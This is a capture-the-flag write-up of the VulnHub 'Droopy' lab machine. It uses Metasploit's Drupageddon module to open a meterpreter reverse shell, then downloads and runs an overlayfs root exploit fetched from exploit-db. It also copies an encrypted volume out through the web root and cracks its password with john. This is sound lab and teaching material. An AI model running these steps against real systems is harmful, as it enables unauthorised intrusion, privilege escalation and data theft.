Vulnhub Droopy

Droopy homepage A few days ago, I installed a new pentesting box based on Arch Linux with Kali

in a virtual machine. In order to test it I select a light vulnbox on vulnhub : Droopy. There were two hints on the description of the machine on the vulnhub download page:

  1. Grab a copy of the rockyou wordlist.
  2. It's fun to read other people's email.

We will see how to use them in a moment :)

Discovery

Our nmap scan give us nothing but an open 80 port running a HTTP server. Let's give a look to the website:

Droopy homepage

Wappalyzer give use the precise version of the Drupal used (with the name and to logo of the VM it is easy to deduce that this is a Drupal machine). The version is Drupal 7.0 which is vulnerable to CVE-2014-3704 also called drupal_drupageddon.

Exploit

We use metasploit to directly have the Drupal exploit AND directly a meterpreter:

msf > search drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================

  Name                                           Disclosure Date  Rank       Description
  ----                                           ---------------  ----       -----------
  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

We set the RHOST to the VM's IP address

msf exploit(drupal_drupageddon) > set RHOST 10.0.2.4

We check our options

msf exploit(drupal_drupageddon) > show options

Module options (exploit/multi/http/drupal_drupageddon):

  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      10.0.2.4         yes       The target address
  RPORT      80               yes       The target port
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The target URI of the Drupal installation
  VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  LHOST  10.0.2.15        yes       The listen address
  LPORT  4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Drupal 7.0 - 7.31

We launch our exploit against the server and praise for a reverse shell: msf exploit(drupal_drupageddon) > exploit

Started reverse TCP handler on 10.0.2.15:4444
Testing page
Creating new user ULMihKJWdb:giXrJOFefa
Logging in as ULMihKJWdb:giXrJOFefa
Trying to parse enabled modules
Enabling the PHP filter module
Setting permissions for PHP filter module
Getting tokens from create new article page
Calling preview page. Exploit should trigger...
Sending stage (33721 bytes) to 10.0.2.4
Meterpreter session 2 opened (10.0.2.15:4444 -> 10.0.2.4:52349) at 2016-05-10 16:56:46 +0200

Second hint

Okay it works, we got a meterperter with the user www-data, let's follow the hint a get a look to the e-mails:

meterpreter ls /var/mail
Listing: /var/mail
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100777/rwxrwxrwx  564   fil   2016-04-14 20:32:01 +0200  www-data

Let's read the e-mails of www-data:

From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

  I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

Privilege escalation

We need a privilege escalation. Like for Fart-knocker We can use the CVE-2015-1328 exploiting overlayFS to get a root shell on the machine.

We spawn a shell:

meterpreter > shell
Process 1233 created.
Channel 1 created.

We still have the permissions of www-data:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We download the exploit ofs.c:

wget https://www.exploit-db.com/download/37292
--2016-05-10 15:58:12--  https://www.exploit-db.com/download/37292
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [application/txt]
Saving to: '37292'

    0K .....                                                 100%  358M=0s

2016-05-10 15:58:12 (358 MB/s) - '37292' saved [5123/5123]

We rename the file:

mv 37292 ofs.c

We compile it and add execution permission:

gcc ofs.c -o ofs
chmod +x ofs

Then we just run it to gain root privileges on the box:

./ofs
collect2: error: ld returned 1 exit status
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
id
# uid=0(root) gid=0(root) groups=0(root),33(www-data)

Okay let us search for the flag:

ls /root/
# dave.tc

First hint

It seems we have a truecrypt volume, let's download it on our machine for more investigation:

cp /root/dave.tc /var/www/html/

Then we can download it directly from the server at http://10.0.2.4/dave.tc

We need to extract the hashes from the file to pass them to john, hopefully a tool exist just for that (we need to compile it):

http://article.gmane.org/gmane.comp.security.openwall.john.user/5320

As the mail mention the academy and the hint mention the rockyou password list, let us just extract the academy related passwords from it:

grep academy /media/sf_password_lists/rockyou.txt > /tmp/test

We launch john against the file with our partial rockyou list:

john dave.tc.john -w=/tmp/test
Warning: detected hash type "tc_aes_xts", but the string is also recognized as "tc_ripemd160"
Use the "--format=tc_ripemd160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (tc_aes_xts, TrueCrypt AES256_XTS [SHA512 128/128 AVX 2x /RIPEMD160/WHIRLPOOL])
Loaded hashes with cost 1 (hash algorithm [1:SHA512 2:RIPEMD160 3:Whirlpool]) varying from 1 to 3
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 54.22% (ETA: 17:16:27) 0g/s 59.89p/s 359.3c/s 359.3C/s fordacademy..ffmusicacademy
etonacademy      (truecrypt_normal_volume)
1g 0:00:00:03 DONE (2016-05-10 17:16) 0.2724g/s 59.94p/s 331.8c/s 331.8C/s 06academy..!academy
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We mount the container using veracrypt:

veracrypt dave.tc -tc

Let us do a tree -a to see what file we have in this container:

.
├── buller
│   └── BullingdonCrest.jpg
├── lost+found [error opening dir]
├── panama
│   └── shares.jpg
└── .secret
    ├── piers.png
    └── .top
        └── flag.txt

5 directories, 4 files

Conclusion

Content of ./secret/.top/flag.txt

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                --knightmare

It was a nice challenge, mainly for the beginner, probably a lack in the web part (or the use of metapsloit, spoil myself of some fun exploiting the SQL injection manually).

Thanks to knightmare for the VM and as always thanks to vulnhub !